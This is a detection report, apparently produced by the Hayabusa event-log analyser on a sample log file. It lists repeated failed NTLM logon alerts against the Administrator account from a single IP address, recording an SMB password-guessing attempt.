2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
